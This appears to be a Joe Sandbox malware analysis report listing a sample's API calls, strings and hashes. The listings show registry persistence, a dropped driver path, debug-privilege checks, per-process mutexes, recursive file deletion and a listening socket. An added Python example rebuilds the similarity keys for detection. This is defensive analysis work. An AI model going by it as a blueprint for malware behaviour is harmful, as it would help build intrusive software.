• GetProcAddress.KERNEL32(00000000,012827A0), ref: 01293C4E
• GetProcAddress.KERNEL32(00000000,012827B0), ref: 01293C67
• LoadLibraryA.KERNEL32(01282894), ref: 01293C79
• GetProcAddress.KERNEL32(00000000,012828D8), ref: 01293C9C
• GetProcAddress.KERNEL32(00000000,012828B0), ref: 01293CB5
• GetProcAddress.KERNEL32(00000000,012828C4), ref: 01293CCD
• GetProcAddress.KERNEL32(00000000,012828A0), ref: 01293CE6
• RegOpenKeyExA.KERNEL32(80000001,012821D4,00000000,000F003F,00000000), ref: 01293D0B
• RegSetValueExA.KERNEL32(00000000,012821C0,00000000,00000004,00000000,00000004), ref: 01293D3A
• RegCloseKey.KERNEL32(00000000), ref: 01293D47
• RegOpenKeyExA.KERNEL32(80000002,012822EC,00000000,000F003F,00000000), ref: 01293D67
• RegSetValueExA.KERNEL32(00000000,01282328,00000000,00000004,00000000,00000004), ref: 01293D96
• RegCloseKey.ADVAPI32(00000000), ref: 01293DA3
• lstrcpy.KERNEL32(00000000,01282384), ref: 01293DB7
• lstrcat.KERNEL32(00000000,0128242C), ref: 01293DCA
• RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 01293DEA
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 01293E02
• wsprintfA.USER32 ref: 01293E1C
• lstrlen.KERNEL32(?), ref: 01293E2C
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 01293E4C
• RegCloseKey.ADVAPI32(?), ref: 01293E59
• RegOpenKeyExA.KERNEL32(80000002,01282384,00000000,000F003F,00000000), ref: 01293E79
• RegSetValueExA.KERNELBASE(00000000,0128274C,00000000,00000004,00000000,00000004), ref: 01293EAC
• RegSetValueExA.KERNELBASE(00000000,0128275C,00000000,00000004,00000000,00000004), ref: 01293ED7
• RegSetValueExA.KERNEL32(00000000,01282774,00000000,00000004,00000001,00000004), ref: 01293F02
• RegCloseKey.KERNEL32(00000000), ref: 01293F0F
  • Part of subcall function 01290B9A: lstrcpy.KERNEL32(?,?), ref: 01290BC8
  • Part of subcall function 01290B9A: GetTickCount.KERNEL32 ref: 01290BCE
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: lstrlen.KERNEL32(?,01283D08,00000000), ref: 01290BE1
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: wsprintfA.USER32 ref: 01290BEF
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01290C0E
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: CloseHandle.KERNEL32(?), ref: 01290C2A
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: DeleteFileA.KERNEL32(?), ref: 01290C37
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Windows\,00000104), ref: 01293F1F
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\), ref: 01293F2A
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\,01283E20), ref: 01293F46
                                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(00000000,00000080), ref: 01293F64
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01293F71
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01293F8F
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(Software\Erlloywmr,Software\), ref: 01293FD3
                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,00000080), ref: 01293FF1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01293FFE
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,01282364), ref: 01294017
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01294055
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(Software\Erlloywmr), ref: 012940D0
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E4,C:\Windows\mqiwauwsp.log), ref: 012940FC
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\mqiwauwsp.log), ref: 01294107
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\mqiwauwsp.log,01283E30), ref: 01294123
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(C:\Windows\mqiwauwsp.log,01282100), ref: 01294145
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(C:\Windows\mqiwauwsp.log,C:\Windows\), ref: 01294157
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 0129417F
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\mqiwauwsp.log), ref: 012941F4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\mqiwauwsp.log,0128266C), ref: 01294211
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,01282370), ref: 0129422A
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(46390628699), ref: 01294357
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 012943AA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 012943BD
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,01283E34,?), ref: 01294474
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01294482
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0128226C), ref: 012944B8
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,00000080), ref: 012944C8
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys), ref: 012944D3
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,01283E38), ref: 012944EF
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,01282288), ref: 01294501
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,?), ref: 01294513
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00020000), ref: 01294520
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00020000), ref: 01294532
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrlen$lstrcat$AddressProcValuelstrcpy$Close$Open$Filewsprintf$Name$AllocCountCreateDirectoryGlobalLibraryLoadTick$ComputerDeleteHandleMappingModulePathSystemTempUserWindows
• String ID: 46390628699$C:\Windows\mqiwauwsp.log$C:\Windows\system32\drivers\npjnsn.sys$Software\$Software\Erlloywmr$fronC:\Windows\$n
• API String ID: 1097455987-1778184363
• Opcode ID: e3025eff597879ba540d77932ed0d7889ab4330db3bd79e045dcc3400e5ab868
• Instruction ID: 26665bc39ebdcc4d5392778a06bbae56300b9d29e7af92577abffad0a5611e46
• Opcode Fuzzy Hash: e3025eff597879ba540d77932ed0d7889ab4330db3bd79e045dcc3400e5ab868
• Instruction Fuzzy Hash: 4142E4B0A10654DFDF24DBA8EC9DBAA77B5FF88705F0081D8E609962D4DB706A84CF50
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: ExchangeInterlocked
• String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$PE$_lopen$d$d$d
• API String ID: 367298776-1942104897
• Opcode ID: 473d0e28adef39b39ded3938f04ab7ad0cf5a099a8e39de6ef07ac6c8d8462f3
• Instruction ID: 95c4938438d9a8a6b0c7d4a4dc89be5aa304bba51812c6770e3e41b089866c0b
• Opcode Fuzzy Hash: 473d0e28adef39b39ded3938f04ab7ad0cf5a099a8e39de6ef07ac6c8d8462f3
• Instruction Fuzzy Hash: C73349B1D11229DFDB24DF58CD84BE9B7B5BB84304F1881E9E20AAB285D7319A84CF54

Control-flow Graph
APIs
• OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 01291FE1
• GetLastError.KERNEL32 ref: 01291FFA
• GetVersionExA.KERNEL32(00000094), ref: 01292033
• GetCurrentThread.KERNEL32 ref: 01292063
• OpenThreadToken.ADVAPI32(00000000), ref: 0129206A
• GetLastError.KERNEL32 ref: 01292074
• OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 012921B7
• CloseHandle.KERNEL32(00000000), ref: 012924BB
• CloseHandle.KERNEL32(?), ref: 012924DB
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 012924F3
• HeapFree.KERNEL32(00000000), ref: 012924FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenProcess$CloseErrorHandleHeapLastThreadToken$CurrentFreeVersion
                                                                                                                                                                                                                                    • String ID: P$SeDebugPrivilege$local service$network service$system
                                                                                                                                                                                                                                    • API String ID: 3470919082-3830299594
                                                                                                                                                                                                                                    • Opcode ID: f4885eb569cda6e93c41bb0ff35d6bf63bb261f2d9f8caf9247b10bf3e8cc2c8
                                                                                                                                                                                                                                    • Instruction ID: 34f248fce56a3a869a0219e909ee080a8b59bb30f2ce6858bf3fbc03dcd96eea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4885eb569cda6e93c41bb0ff35d6bf63bb261f2d9f8caf9247b10bf3e8cc2c8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57F17D74A20259EBEF30CFA8DC49BED7778FB48711F108288E615A61C4D7B46A94CF50

Control-flow Graph
(graph image omitted; recoverable data: function 01291060, basic blocks 1291060-12914d8. API calls on its paths: Sleep, lstrcat, FindFirstFileA, FindNextFileA, lstrlen, lstrcmpiA, lstrcpy, DeleteFileA, FindClose. The block at 12913f7 calls 1291060 itself, i.e. the directory walk recurses; other subcalls go to 1288deb, 128e329, 128a26e, 1290cf6 and 1290e71.)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrcatlstrlen$FileFindSleeplstrcmpi$lstrcpy$CloseDeleteFirstNext
• String ID: .lnk$.lnk$.lnk$.tmp$C:\Windows\$d
• API String ID: 3707883041-2096895072
• Opcode ID: 584960cee14a85f72c37938862dceb32a34d6079830efa50fdcaa0d2676465a8
• Instruction ID: 0b58fff1f1a7f75d03b08b1cc68912ac23ea9c4a123286d2456d3fb831554c3f
• Opcode Fuzzy Hash: 584960cee14a85f72c37938862dceb32a34d6079830efa50fdcaa0d2676465a8
• Instruction Fuzzy Hash: CCD1BEB5A1020AABDF14DF69D885BAE3BB5FF88315F14C118F915DB285D335E820CBA4

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01292545
• Process32First.KERNEL32(00000000,00000128), ref: 01292584
• lstrlen.KERNEL32(?,00000000,00000128,00000002,00000000), ref: 012925A5
• lstrcpyn.KERNEL32(00000000,?,00000040), ref: 012925C0
• lstrcpy.KERNEL32(00000000,?), ref: 012925D6
• CharLowerA.USER32(00000000), ref: 012925E3
• lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 012925FC
• wsprintfA.USER32 ref: 0129260A
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0129261E
• GetLastError.KERNEL32 ref: 0129262A
• ReleaseMutex.KERNEL32(?), ref: 0129263D
• CloseHandle.KERNEL32(?), ref: 0129264A
• Process32Next.KERNEL32(00000000,00000128), ref: 0129267D
• lstrlen.KERNEL32(?,00000000,00000128,00000000,00000128,00000000,00000128,00000002,00000000), ref: 0129269E
• lstrcpyn.KERNEL32(00000000,?,00000040), ref: 012926B9
• lstrcpy.KERNEL32(00000000,?), ref: 012926CF
• CharLowerA.USER32(00000000), ref: 012926DC
• lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 012926F5
• wsprintfA.USER32 ref: 01292703
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 01292717
• GetLastError.KERNEL32 ref: 01292723
• ReleaseMutex.KERNEL32(?), ref: 01292736
• CloseHandle.KERNEL32(?), ref: 01292743
• CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01292774
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Mutexlstrlen$CloseCreateHandle$CharErrorLastLowerProcess32Releaselstrcpylstrcpynwsprintf$FirstNextSnapshotToolhelp32
• String ID: M_%d_$M_%d_
• API String ID: 3105503624-485321427
• Opcode ID: 15e135cff8904ada979803181d7fa09d1cb7b8f45b7f8e802861b332618d3cb7
• Instruction ID: ddaee7e83282372504ad02e7092569cc1ab98cae541a4d7eaedb7b1abc6b1d0a
• Opcode Fuzzy Hash: 15e135cff8904ada979803181d7fa09d1cb7b8f45b7f8e802861b332618d3cb7
• Instruction Fuzzy Hash: B95152B5810218EFDF30DB64EC8CBD97778AB58301F1085D9E649A2184DBB4AAD4CF50
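Worked example, added here and not part of the Joe Sandbox report or of Joe Security's tooling: it rebuilds the API ID and String ID shown in the Similarity block above from the API listing of the function at 01292545, so that the same function can be recognised in another sample's listing. The grouping rule it implements (split each API name at case boundaries, drop a trailing A/W and a Get prefix, count tokens over the whole listing, emit tiers by descending count with tokens ASCII-sorted inside a tier and tiers joined by `$`; strings are the non-hex arguments, ASCII-sorted with duplicates kept) was inferred from the three Similarity blocks on this page and is an assumption, as is skipping lines marked "Part of subcall function". The numeric API String ID is a hash this example does not reproduce. The names `MUTEX_FUNCTION_LISTING`, `Call`, `parse_listing`, `api_tokens`, `api_id`, `string_id` and `mutex_name_formats` are this example's own.

```python
"""Rebuild Joe Sandbox "API ID" / "String ID" similarity keys from a
function's API-call listing.

Added example, not code from the report or from Joe Security. The grouping
rule below was inferred from the Similarity blocks on this page and is an
assumption; the numeric "API String ID" hash is not reproduced.
"""
import re
from collections import Counter
from typing import List, NamedTuple

# Constructed input: the listing of the CreateToolhelp32Snapshot/CreateMutexA
# function at 01292545, copied in the report's own line format.
MUTEX_FUNCTION_LISTING = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01292545
• Process32First.KERNEL32(00000000,00000128), ref: 01292584
• lstrlen.KERNEL32(?,00000000,00000128,00000002,00000000), ref: 012925A5
• lstrcpyn.KERNEL32(00000000,?,00000040), ref: 012925C0
• lstrcpy.KERNEL32(00000000,?), ref: 012925D6
• CharLowerA.USER32(00000000), ref: 012925E3
• lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 012925FC
• wsprintfA.USER32 ref: 0129260A
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0129261E
• GetLastError.KERNEL32 ref: 0129262A
• ReleaseMutex.KERNEL32(?), ref: 0129263D
• CloseHandle.KERNEL32(?), ref: 0129264A
• Process32Next.KERNEL32(00000000,00000128), ref: 0129267D
• lstrlen.KERNEL32(?,00000000,00000128,00000000,00000128,00000000,00000128,00000002,00000000), ref: 0129269E
• lstrcpyn.KERNEL32(00000000,?,00000040), ref: 012926B9
• lstrcpy.KERNEL32(00000000,?), ref: 012926CF
• CharLowerA.USER32(00000000), ref: 012926DC
• lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 012926F5
• wsprintfA.USER32 ref: 01292703
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 01292717
• GetLastError.KERNEL32 ref: 01292723
• ReleaseMutex.KERNEL32(?), ref: 01292736
• CloseHandle.KERNEL32(?), ref: 01292743
• CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01292774
"""

# "• Api.MODULE(args), ref: ADDR" or "• Api.MODULE ref: ADDR" (no argument list)
CALL_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX_ARG_RE = re.compile(r"^[0-9A-Fa-f]{8}$")        # unresolved pointer / integer args
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*")  # CamelCase split, digits stay attached


class Call(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: str


def parse_listing(text: str) -> List[Call]:
    """Parse the bullet lines; 'Part of subcall function' lines are ignored (assumption)."""
    calls = []
    for line in text.splitlines():
        if "Part of subcall function" in line:
            continue
        m = CALL_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref")))
    return calls


def api_tokens(api: str) -> List[str]:
    """Split at case boundaries; drop a trailing A/W suffix and a Get prefix (assumption)."""
    toks = TOKEN_RE.findall(api)
    if toks and toks[-1] in ("A", "W"):
        toks.pop()
    return [t for t in toks if t != "Get"]


def api_id(calls: List[Call]) -> str:
    """Tiers by descending token count, ASCII-sorted inside a tier, tiers joined by '$'."""
    counts = Counter(t for c in calls for t in api_tokens(c.api))
    tiers = {}
    for tok, n in counts.items():
        tiers.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(tiers[n])) for n in sorted(tiers, reverse=True))


def string_id(calls: List[Call]) -> str:
    """Non-hex, non-'?' arguments, ASCII-sorted, duplicates kept, joined by '$'."""
    strings = [a for c in calls for a in c.args
               if a and a != "?" and not HEX_ARG_RE.match(a)]
    return "$".join(sorted(strings))


def mutex_name_formats(calls: List[Call]) -> List[str]:
    """printf-style strings in a listing that also creates a mutex (the M_%d_ case above)."""
    if not any(c.api.startswith("CreateMutex") for c in calls):
        return []
    return sorted({a for c in calls for a in c.args if "%" in a})
```

`api_id(parse_listing(MUTEX_FUNCTION_LISTING))` returns the API ID printed in the Similarity block for this function and `string_id` returns `M_%d_$M_%d_`; a function in another report whose listing yields the same two keys is a candidate for the same code. `mutex_name_formats` returns `M_%d_`, the printf-style string the listing passes to wsprintfA immediately before CreateMutexA and GetLastError inside the Process32First/Process32Next loop, so the mutex name is built from a decimal value per enumerated process.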

Control-flow Graph
(graph image omitted; recoverable data: function 128a2f5, basic blocks 128a2f5-128a550. The API calls it makes are listed under APIs below; subcalls go to 12844cb, 1284060, 128a26e and 128a2ad. Blocks 128a3b8-128a53d form a loop that returns to 128a3b8 after the Sleep at 128a532, and the path out of the loop ends in RtlExitUserThread at 128a542.)
APIs
  • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
• Sleep.KERNEL32 ref: 0128A374
• GetTempPathA.KERNEL32(00000100,00000000), ref: 0128A386
• lstrlen.KERNEL32(00000000), ref: 0128A393
• lstrcat.KERNEL32(00000000,01283CAC), ref: 0128A3B2
• lstrlen.KERNEL32(00000000), ref: 0128A3CC
• lstrcpy.KERNEL32(00000000,00000000), ref: 0128A3E6
• lstrcat.KERNEL32(00000000,01283CB0), ref: 0128A3F8
• FindFirstFileA.KERNEL32(00000000,00000000), ref: 0128A422
• FindNextFileA.KERNEL32(000000FF,00000000), ref: 0128A449
• lstrcat.KERNEL32(00000000,?), ref: 0128A473
• lstrlen.KERNEL32(00000000), ref: 0128A480
• lstrlen.KERNEL32(?), ref: 0128A493
• lstrcmpiA.KERNEL32(00000000,012826F0), ref: 0128A4AF
• lstrcmpiA.KERNEL32(00000000,_Rar), ref: 0128A4F3
• Sleep.KERNEL32(00000100), ref: 0128A511
• FindClose.KERNEL32(00000000), ref: 0128A52C
• Sleep.KERNEL32(000927C0), ref: 0128A537
• RtlExitUserThread.NTDLL(00000000), ref: 0128A544
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$FindSleeplstrcat$Filelstrcmpi$CloseExchangeExitFirstInterlockedNextPathTempThreadUserlstrcpy
                                                                                                                                                                                                                                    • String ID: _Rar
                                                                                                                                                                                                                                    • API String ID: 932915221-536834240
                                                                                                                                                                                                                                    • Opcode ID: 0733e7eb6a6ef1adfebe6e5fd0392222da9031052779e6b609fb9a8bd95f80fc
                                                                                                                                                                                                                                    • Instruction ID: 891eaebd03428483826076abdd2ee720cdb9d73c0b57b51ff8df41f09466b20a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0733e7eb6a6ef1adfebe6e5fd0392222da9031052779e6b609fb9a8bd95f80fc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A51CF719012199BDF20EB64EC48BEE7779AB84705F0084E9E60EA61D4DB75ABC4CF60

Control-flow Graph
control_flow_graph 1081 129392d-1293967 call 1298060 1084 1293968-129396f 1081->1084 1085 129397e-12939b5 lstrcpy LoadLibraryA 1084->1085 1086 1293971-129397c Sleep 1084->1086 1087 12939cf-12939d6 1085->1087 1088 12939b7-12939ca GetProcAddress 1085->1088 1086->1084 1089 12939d8-1293a12 FreeLibrary lstrcat LoadLibraryA 1087->1089 1090 1293a2c-1293a94 call 129377a CreateThread call 12841c6 CreateThread call 12841c6 Sleep 1087->1090 1088->1087 1089->1090 1091 1293a14-1293a27 GetProcAddress 1089->1091 1098 1293ab0-1293ab7 1090->1098 1091->1090 1099 1293ab9-1293ae5 Sleep CreateThread call 12841c6 1098->1099 1100 1293ae7-1293b0c Sleep call 129174a * 2 1098->1100 1099->1098 1108 1293b19-1293b20 1100->1108 1109 1293b5e Sleep 1108->1109 1110 1293b22-1293b29 1108->1110 1109->1108 1110->1109 1111 1293b2b-1293b32 1110->1111 1111->1109 1113 1293b34-1293b56 call 1284060 call 129195d 1111->1113 1117 1293b5b 1113->1117 1117->1109
APIs
• Sleep.KERNEL32(00001000), ref: 01293976
• lstrcpy.KERNEL32(00000000,01282714), ref: 0129398B
• LoadLibraryA.KERNEL32(00000000), ref: 012939A2
• GetProcAddress.KERNEL32(00000000,01282700), ref: 012939C4
• FreeLibrary.KERNEL32(00000000), ref: 012939DF
• lstrcat.KERNEL32(00000000,012822B0), ref: 012939F2
• LoadLibraryA.KERNEL32(00000000), ref: 012939FF
• GetProcAddress.KERNEL32(00000000,01282700), ref: 01293A21
• CreateThread.KERNEL32(00000000,00000000,01293062,00000000,00000000,00000000), ref: 01293A49
• CreateThread.KERNEL32(00000000,00000000,01291E9B,00000000,00000000,?), ref: 01293A70
• Sleep.KERNEL32(00000400), ref: 01293A84
• Sleep.KERNEL32(00000400), ref: 01293AAA
• CreateThread.KERNEL32(00000000,00000000,01291CE3,0000005A,00000000,?), ref: 01293AD6
• Sleep.KERNEL32(00000400), ref: 01293AEC
• Sleep.KERNEL32(000DBBA0), ref: 01293B13
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
• String ID: Z
• API String ID: 4104366077-1505515367
• Opcode ID: a82d1bbcccd8ecc3cca1cd71158ef37eceacc9e13b4da9804255f6246d2a9d2f
• Instruction ID: f2d2c87bd411ab94066e52246f0af92ab265879b33d90d8caba09f1f4696c74c
• Opcode Fuzzy Hash: a82d1bbcccd8ecc3cca1cd71158ef37eceacc9e13b4da9804255f6246d2a9d2f
• Instruction Fuzzy Hash: 9B519975A20285EBEF31DB68EC09BE93774BB48702F008198E749A61C4D7F42AD4CB61
APIs
• htons.WS2_32(00000FF1), ref: 01287AE9
• socket.WS2_32(00000002,00000002,00000000), ref: 01287B06
• setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 01287B44
• bind.WS2_32(?,00000002,00000010), ref: 01287B5A
• closesocket.WS2_32(?), ref: 01287C31
• RtlExitUserThread.NTDLL(00000000), ref: 01287C39
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
• String ID:
• API String ID: 3895830221-0
• Opcode ID: 4d532038f1264c0b0a0f57266e2ef67f8fe505b5dc33358f8efc8b1edebde4f6
• Instruction ID: 7f8becdfc106cb13bec097bfdcc8fdfe130e34ef00b09c74e968a783deba64e0
• Opcode Fuzzy Hash: 4d532038f1264c0b0a0f57266e2ef67f8fe505b5dc33358f8efc8b1edebde4f6
• Instruction Fuzzy Hash: 78513A70A11398EBEB309F64DD09BD9B6B4BF48740F1042E9E289AB2D4D7F45AC48F54
APIs
• lstrcpy.KERNEL32(?,?), ref: 012909A3
  • Part of subcall function 0128A677: GetTickCount.KERNEL32 ref: 0128A6C5
